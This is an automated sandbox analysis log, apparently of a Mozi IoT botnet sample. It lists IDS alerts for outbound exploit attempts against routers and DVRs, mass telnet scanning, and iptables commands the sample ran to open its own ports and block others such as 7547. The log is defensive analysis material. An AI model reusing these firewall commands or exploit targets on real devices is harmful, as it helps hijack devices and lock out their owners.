Source: Traffic, Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:32776 -> 23.236.242.26:80
Source: Traffic, Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 59.96.39.49:1027 -> 192.168.2.20:8987
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.96.55.112: -> 192.168.2.20:
Source: Traffic, Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 193.50.198.5: -> 192.168.2.20:
Source: Traffic, Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:54454 -> 23.12.191.118:80
Source: Traffic, Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:54454 -> 23.12.191.118:80
Source: Traffic, Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.12.191.118:80 -> 192.168.2.20:54454
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 80.255.14.222: -> 192.168.2.20:
Source: Traffic, Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 131.100.27.86: -> 192.168.2.20:
Source: Traffic, Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:59832 -> 23.53.160.36:80
Source: Traffic, Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:59832 -> 23.53.160.36:80
Source: Traffic, Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.53.160.36:80 -> 192.168.2.20:59832
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 77.7.89.221: -> 192.168.2.20:
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 149.28.33.22: -> 192.168.2.20:
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 213.222.29.194: -> 192.168.2.20:
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.221.222.106: -> 192.168.2.20:
Source: Traffic, Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 116.68.99.187:63032 -> 192.168.2.20:8987
Source: Traffic, Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 5.106.1.251:3317 -> 192.168.2.20:8987
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.149.61.90: -> 192.168.2.20:
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 63.148.112.178: -> 192.168.2.20:
Source: Traffic, Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 212.149.148.17: -> 192.168.2.20:
Source: Traffic, Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:39748 -> 2.22.143.222:80
Source: Traffic, Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:39748 -> 2.22.143.222:80
Source: Traffic, Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 2.22.143.222:80 -> 192.168.2.20:39748
Source: Traffic, Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 172.241.192.161: -> 192.168.2.20:
Source: Traffic, Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:33236 -> 180.254.107.55:80
Source: Traffic, Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:33236 -> 180.254.107.55:80
Source: Traffic, Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:55722 -> 34.66.226.190:80
Source: Traffic, Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:49434 -> 104.149.254.177:80
Source: Traffic, Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:49434 -> 104.149.254.177:80
Source: Traffic, Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 80.255.15.98: -> 192.168.2.20:
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 178.27.146.71: -> 192.168.2.20:
Source: Traffic, Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:53268 -> 104.103.19.232:80
Source: Traffic, Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:53268 -> 104.103.19.232:80
Source: Traffic, Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.103.19.232:80 -> 192.168.2.20:53268
Source: Traffic, Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:45072 -> 77.238.74.163:80
Source: Traffic, Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:45072 -> 77.238.74.163:80
              Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:37542 -> 176.119.128.106:80
              Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:37542 -> 176.119.128.106:80
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.155.20.45: -> 192.168.2.20:
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 178.27.214.206: -> 192.168.2.20:
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.141.215.230: -> 192.168.2.20:
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 217.236.144.108: -> 192.168.2.20:
              Connects to many ports of the same IP (likely port scanning)
              Executes the "iptables" command to insert, remove and/or manipulate rules
              Source: /bin/sh (PID: 4638) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 60120 -j ACCEPT
              Source: /bin/sh (PID: 4670) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 60120 -j ACCEPT
              Source: /bin/sh (PID: 4674) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 60120 -j ACCEPT
              Source: /bin/sh (PID: 4718) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 60120 -j ACCEPT
              Source: /bin/sh (PID: 4737) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 60120 -j ACCEPT
              Source: /bin/sh (PID: 4747) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 60120 -j ACCEPT
              Source: /bin/sh (PID: 4772) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 60120 -j ACCEPT
              Source: /bin/sh (PID: 4793) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 60120 -j ACCEPT
              Source: /bin/sh (PID: 4813) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
              Source: /bin/sh (PID: 4816) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
              Source: /bin/sh (PID: 4825) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
              Source: /bin/sh (PID: 4847) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
              Source: /bin/sh (PID: 4895) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
              Source: /bin/sh (PID: 4918) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
              Source: /bin/sh (PID: 4945) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
              Source: /bin/sh (PID: 4966) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
              Source: /bin/sh (PID: 4985) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
              Source: /bin/sh (PID: 5004) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
              Source: /bin/sh (PID: 5022) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
              Source: /bin/sh (PID: 5042) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
              Source: /bin/sh (PID: 5060) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
              Source: /bin/sh (PID: 5079) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
              Source: /bin/sh (PID: 5097) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
              Source: /bin/sh (PID: 5118) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
              Source: /bin/sh (PID: 5219) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 8987 -j ACCEPT
              Source: /bin/sh (PID: 5222) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 8987 -j ACCEPT
              Source: /bin/sh (PID: 5226) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 8987 -j ACCEPT
              Source: /bin/sh (PID: 5242) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 8987 -j ACCEPT
              Source: /bin/sh (PID: 5265) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 8987 -j ACCEPT
              Source: /bin/sh (PID: 5288) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 8987 -j ACCEPT
              Source: /bin/sh (PID: 5314) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 8987 -j ACCEPT
              Source: /bin/sh (PID: 5338) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 8987 -j ACCEPT
              Uses known network protocols on non-standard ports
              Source: unknown Network traffic detected: HTTP traffic on port 56274 -> 52869
              Source: unknown Network traffic detected: HTTP traffic on port 52869 -> 56274
              Source: unknown Network traffic detected: HTTP traffic on port 45556 -> 49152
              Source: unknown Network traffic detected: HTTP traffic on port 49152 -> 45556
              Source: unknown Network traffic detected: HTTP traffic on port 39288 -> 49152
              Source: unknown Network traffic detected: HTTP traffic on port 49152 -> 39288
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 64.60.156.172:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 170.28.13.241:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 69.148.51.105:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 94.119.137.8:1023
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 78.58.120.106:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 125.31.207.97:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 169.247.212.103:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 86.1.120.215:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 201.145.205.246:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 176.17.112.147:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 180.249.225.38:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 54.126.72.39:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 207.220.37.255:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 156.124.19.178:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 9.119.106.44:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 125.196.149.212:1023
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 218.52.94.240:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 206.22.158.92:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 149.165.201.122:2323
              Source: global trafficTCP traffic: 192.168.2.20:36286 -> 151.235.98.188:52869
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 70.142.209.180:1023
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 19.67.205.237:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 67.232.197.142:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 145.214.33.95:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 161.26.89.62:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 62.190.128.79:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 197.86.174.173:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 114.99.17.241:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 189.179.160.80:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 91.223.186.181:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 34.126.231.244:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 57.97.159.30:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 74.34.224.22:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 164.100.155.219:1023
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 115.145.169.30:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 77.206.48.106:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 102.86.201.96:1023
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 23.66.190.127:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 171.82.232.134:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 23.134.142.150:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 76.120.94.75:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 126.39.183.239:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 204.15.252.204:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 60.19.190.113:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 24.111.17.40:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 180.58.196.188:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 23.141.250.44:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 221.104.222.102:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 174.231.155.97:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 13.111.18.70:1023
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 18.132.143.23:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 207.221.231.94:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 74.156.135.124:2323
              Source: global trafficTCP traffic: 192.168.2.20:32832 -> 72.116.52.243:8443
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 195.182.237.244:1023
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 157.9.213.184:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 156.149.46.74:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 175.243.55.238:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 181.229.246.160:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 173.96.113.131:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 211.160.156.9:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 200.233.160.240:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 96.150.185.206:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 2.223.160.174:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 109.168.201.230:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 98.110.180.156:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 188.182.24.215:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 202.100.225.66:1023
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 108.80.251.155:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 188.151.208.67:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 67.136.137.120:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 178.127.63.205:1023
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 72.252.87.71:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 63.205.40.16:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 79.115.27.234:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 35.64.204.253:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 209.143.238.124:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 82.92.199.247:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 115.122.10.41:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 200.79.154.190:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 66.226.192.6:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 179.52.72.165:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 178.106.158.1:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 152.75.61.215:1023
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 99.146.105.31:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 153.48.151.95:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 203.122.112.94:2323
              Source: global trafficTCP traffic: 192.168.2.20:59544 -> 157.20.10.149:81
              Source: global trafficTCP traffic: 192.168.2.20:42124 -> 63.188.189.233:8443
              Source: global trafficTCP traffic: 192.168.2.20:43584 -> 62.238.173.138:7574
              Source: global trafficTCP traffic: 192.168.2.20:39864 -> 102.217.189.148:8080
              Source: global trafficTCP traffic: 192.168.2.20:58152 -> 198.152.181.234:49152
              Source: global trafficTCP traffic: 192.168.2.20:48704 -> 20.154.149.216:8080
              Source: global trafficTCP traffic: 192.168.2.20:57762 -> 50.172.44.166:8443
              Source: global trafficTCP traffic: 192.168.2.20:32842 -> 44.207.80.65:8080
              Source: global trafficTCP traffic: 192.168.2.20:57258 -> 43.161.129.170:8080
              Source: global trafficTCP traffic: 192.168.2.20:35344 -> 16.216.117.103:7574
              Source: global trafficTCP traffic: 192.168.2.20:56296 -> 48.111.167.94:49152
              Source: global trafficTCP traffic: 192.168.2.20:44748 -> 21.44.246.61:49152
              Source: global trafficTCP traffic: 192.168.2.20:43884 -> 211.98.118.186:81
              Source: global trafficTCP traffic: 192.168.2.20:44378 -> 67.213.164.194:8080
              Source: global trafficTCP traffic: 192.168.2.20:51006 -> 73.168.42.71:8080
              Source: global trafficTCP traffic: 192.168.2.20:36092 -> 207.45.206.85:37215
              Source: global trafficTCP traffic: 192.168.2.20:35316 -> 38.115.189.82:8080
              Source: global trafficTCP traffic: 192.168.2.20:36154 -> 8.196.85.46:8080
              Source: global trafficTCP traffic: 192.168.2.20:52714 -> 169.231.254.119:5555
              Source: global trafficTCP traffic: 192.168.2.20:37056 -> 189.25.210.17:8443
              Source: global trafficTCP traffic: 192.168.2.20:56744 -> 102.162.109.251:81
              Source: global trafficTCP traffic: 192.168.2.20:53314 -> 93.118.156.27:37215
              Source: global trafficTCP traffic: 192.168.2.20:33544 -> 156.30.203.234:8443
              Source: global trafficTCP traffic: 192.168.2.20:37616 -> 96.227.71.31:8080
              Source: global trafficTCP traffic: 192.168.2.20:55648 -> 91.23.94.89:8080
              Source: global trafficTCP traffic: 192.168.2.20:38442 -> 43.30.240.136:8443
              Source: global trafficTCP traffic: 192.168.2.20:44360 -> 114.15.113.65:8080
              Source: global trafficTCP traffic: 192.168.2.20:35250 -> 126.165.195.44:8080
              Source: global trafficTCP traffic: 192.168.2.20:43476 -> 168.152.12.184:49152
              Source: global trafficTCP traffic: 192.168.2.20:42328 -> 185.198.59.136:7574
              Source: global trafficTCP traffic: 192.168.2.20:41498 -> 63.191.13.133:8080
              Source: global trafficTCP traffic: 192.168.2.20:52652 -> 139.249.198.163:5555
              Source: global trafficTCP traffic: 192.168.2.20:50270 -> 22.122.201.176:8080
              Source: global trafficTCP traffic: 192.168.2.20:33924 -> 159.133.144.14:8080
              Source: global trafficTCP traffic: 192.168.2.20:36110 -> 183.43.207.246:37215
              Source: global trafficTCP traffic: 192.168.2.20:49440 -> 22.142.197.254:49152
              Source: global trafficTCP traffic: 192.168.2.20:36466 -> 205.119.206.192:7574
              Source: global trafficTCP traffic: 192.168.2.20:58704 -> 74.5.113.71:7574
              Source: global trafficTCP traffic: 192.168.2.20:56056 -> 191.137.127.161:8443
              Source: global trafficTCP traffic: 192.168.2.20:47620 -> 67.96.246.134:5555
              Source: global trafficTCP traffic: 192.168.2.20:51942 -> 85.217.68.43:49152
              Source: global trafficTCP traffic: 192.168.2.20:32816 -> 117.25.227.147:8443
              Source: global trafficTCP traffic: 192.168.2.20:58336 -> 83.113.163.141:37215
              Source: global trafficTCP traffic: 192.168.2.20:60880 -> 95.68.187.209:8443
              Source: global trafficTCP traffic: 192.168.2.20:56160 -> 105.205.64.147:52869
              Source: global trafficTCP traffic: 192.168.2.20:36858 -> 89.129.131.73:8080
              Source: global trafficTCP traffic: 192.168.2.20:53906 -> 150.211.192.100:37215
              Source: global trafficTCP traffic: 192.168.2.20:34958 -> 155.238.66.118:49152
              Source: global trafficTCP traffic: 192.168.2.20:57126 -> 31.57.44.152:37215
              Source: global trafficTCP traffic: 192.168.2.20:59494 -> 178.149.93.21:8080
              Source: global trafficTCP traffic: 192.168.2.20:40610 -> 169.5.83.203:7574
              Source: global trafficTCP traffic: 192.168.2.20:48244 -> 48.145.15.35:7574
              Source: global trafficTCP traffic: 192.168.2.20:49132 -> 161.96.234.20:37215
              Source: global trafficTCP traffic: 192.168.2.20:57092 -> 202.72.100.208:52869
              Source: global trafficTCP traffic: 192.168.2.20:47052 -> 198.134.133.19:52869
              Source: global trafficTCP traffic: 192.168.2.20:43012 -> 6.37.90.74:37215
              Source: global trafficTCP traffic: 192.168.2.20:33624 -> 92.103.103.47:37215
              Source: global trafficTCP traffic: 192.168.2.20:60776 -> 19.61.113.43:7574
              Source: global trafficTCP traffic: 192.168.2.20:40486 -> 99.181.137.45:8080
              Source: global trafficTCP traffic: 192.168.2.20:37512 -> 171.192.201.93:52869
              Source: global trafficTCP traffic: 192.168.2.20:33650 -> 88.153.234.30:8080
              Source: global trafficTCP traffic: 192.168.2.20:33378 -> 184.151.108.119:8080
              Source: global trafficTCP traffic: 192.168.2.20:52078 -> 37.38.172.114:37215
              Source: global trafficTCP traffic: 192.168.2.20:55364 -> 3.55.225.207:5555
              Source: global trafficTCP traffic: 192.168.2.20:44412 -> 53.253.84.232:5555
              Source: global trafficTCP traffic: 192.168.2.20:48418 -> 166.130.48.19:5555
              Source: global trafficTCP traffic: 192.168.2.20:36482 -> 28.244.244.163:37215
              Source: global trafficTCP traffic: 192.168.2.20:59618 -> 113.161.190.188:52869
              Source: global trafficTCP traffic: 192.168.2.20:50044 -> 118.143.200.102:8080
              Source: global trafficTCP traffic: 192.168.2.20:47252 -> 46.177.88.163:8080
              Source: global trafficTCP traffic: 192.168.2.20:49984 -> 157.228.242.122:81
              Source: global trafficTCP traffic: 192.168.2.20:53300 -> 20.149.201.53:8080
              Source: global trafficTCP traffic: 192.168.2.20:58690 -> 198.225.2.23:49152
              Source: global trafficTCP traffic: 192.168.2.20:45076 -> 160.64.230.81:52869
              Source: global trafficTCP traffic: 192.168.2.20:51264 -> 139.159.32.150:8443
              Source: global trafficTCP traffic: 192.168.2.20:46258 -> 74.35.20.129:81
              Source: global trafficTCP traffic: 192.168.2.20:43480 -> 170.150.75.145:81
              Source: global trafficTCP traffic: 192.168.2.20:60366 -> 209.185.236.134:81
              Source: global trafficTCP traffic: 192.168.2.20:41370 -> 154.210.234.104:8080
              Source: global trafficTCP traffic: 192.168.2.20:59728 -> 50.48.206.45:7574
              Source: global trafficTCP traffic: 192.168.2.20:58308 -> 18.73.233.15:8443
              Source: global trafficTCP traffic: 192.168.2.20:35666 -> 216.193.98.28:8443
              Source: global trafficTCP traffic: 192.168.2.20:47722 -> 8.195.111.22:5555
              Source: global trafficTCP traffic: 192.168.2.20:44058 -> 57.53.105.210:52869
              Source: global trafficTCP traffic: 192.168.2.20:54806 -> 152.234.42.42:37215
              Source: global trafficTCP traffic: 192.168.2.20:48540 -> 220.165.10.156:8080
              Source: global trafficTCP traffic: 192.168.2.20:40736 -> 175.10.248.75:8080
              Source: global trafficTCP traffic: 192.168.2.20:37594 -> 124.244.15.23:8080
              Source: global trafficTCP traffic: 192.168.2.20:55900 -> 219.224.59.244:52869
              Source: global trafficTCP traffic: 192.168.2.20:37038 -> 132.70.142.5:81
              Source: global trafficTCP traffic: 192.168.2.20:56930 -> 34.188.48.201:8080
              Source: global trafficTCP traffic: 192.168.2.20:46906 -> 115.16.10.21:49152
              Source: global trafficTCP traffic: 192.168.2.20:50726 -> 58.177.55.29:8080
              Source: global trafficTCP traffic: 192.168.2.20:49846 -> 63.153.103.58:8080
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 220.81.142.179:1023
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 218.237.227.44:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 221.197.159.218:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 99.70.134.35:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 204.122.188.208:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 212.226.50.190:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 90.192.99.77:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 92.82.131.177:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 184.104.186.255:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 80.254.91.193:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 83.101.129.190:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 150.65.96.123:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 13.28.70.135:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 98.124.110.124:1023
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 180.54.149.225:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 71.97.182.98:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 103.221.97.223:2323
              Source: global trafficTCP traffic: 192.168.2.20:52662 -> 19.234.87.63:8080
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 145.239.19.214:1023
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 114.2.64.142:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 130.221.2.128:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 169.240.120.21:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 4.225.63.171:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 171.88.94.59:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 12.149.196.84:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 110.105.251.231:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 36.251.209.137:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 136.242.26.58:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 80.170.60.151:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 110.76.95.204:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 67.181.53.78:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 169.238.12.52:1023
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 163.191.185.236:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 118.202.243.49:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 94.171.188.7:2323
              Source: global trafficTCP traffic: 192.168.2.20:53980 -> 208.121.15.128:5555
              Source: global trafficTCP traffic: 192.168.2.20:50642 -> 122.143.33.15:37215
              Source: global trafficTCP traffic: 192.168.2.20:36584 -> 44.186.214.45:8080
              Source: global trafficTCP traffic: 192.168.2.20:38480 -> 31.94.18.17:8080
              Source: global trafficTCP traffic: 192.168.2.20:41372 -> 149.223.98.215:8443
              Source: global trafficTCP traffic: 192.168.2.20:34480 -> 173.136.33.68:8443
              Source: global trafficTCP traffic: 192.168.2.20:58924 -> 96.60.228.58:5555
              Source: global trafficTCP traffic: 192.168.2.20:59914 -> 101.103.73.125:5555
              Source: global trafficTCP traffic: 192.168.2.20:32820 -> 58.160.77.79:5555
              Source: global trafficTCP traffic: 192.168.2.20:35174 -> 55.187.169.167:5555
